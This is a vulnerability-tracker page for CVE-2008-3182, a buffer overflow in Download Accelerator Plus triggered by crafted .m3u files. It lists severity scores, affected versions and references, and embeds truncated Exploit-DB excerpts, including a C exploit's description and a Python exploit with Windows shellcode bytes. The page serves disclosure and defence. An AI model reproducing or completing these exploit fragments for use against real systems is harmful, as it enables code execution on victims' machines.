CVE-2008-3182
published 2008-07-15CVE-2008-3182: Stack-based buffer overflow in DAP.exe in Download Accelerator Plus (DAP) 7.0.1.3, 8.6.6.3, and other 8.x versions allows user-assisted remote attackers to…
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.39%
93.7th percentile
Stack-based buffer overflow in DAP.exe in Download Accelerator Plus (DAP) 7.0.1.3, 8.6.6.3, and other 8.x versions allows user-assisted remote attackers to execute arbitrary code via an M3U (.m3u) file containing a long MP3 URL.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| speedbit | download_accelerator_plus | — | — |
| speedbit | download_accelerator_plus | — | — |
| speedbit | download_accelerator_plus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow
exploitdb·2008-07-11
CVE-2008-3182 Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow
Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow
---
#include
#include
/*
DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
SecurityFocus Advisory:
Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute
arbitrary code in the context of the application.Failed exploit attempts
will cause denial-of-service conditions.
Vulnerability discoverd by Krystian Kloskowski (h07)
Original POC by h07 http://www.milw0rm.com/exploits/6030
This poc will create a "special" .m3u file that when imported in DAP and then checked with
the verifiy button will cause a buffer overflow and lead to exploitation.Run the pro
Exploit-DB
Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow
exploitdb·2008-07-08
CVE-2008-3182 Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow
Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow
---
#!/usr/bin/python
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb
No writeups or analysis indexed.
http://secunia.com/advisories/30997http://securityreason.com/securityalert/3997http://www.securityfocus.com/bid/30138http://www.vupen.com/english/advisories/2008/2027/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43674https://www.exploit-db.com/exploits/6030https://www.exploit-db.com/exploits/6039http://secunia.com/advisories/30997http://securityreason.com/securityalert/3997http://www.securityfocus.com/bid/30138http://www.vupen.com/english/advisories/2008/2027/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43674https://www.exploit-db.com/exploits/6030https://www.exploit-db.com/exploits/6039
2008-07-15
Published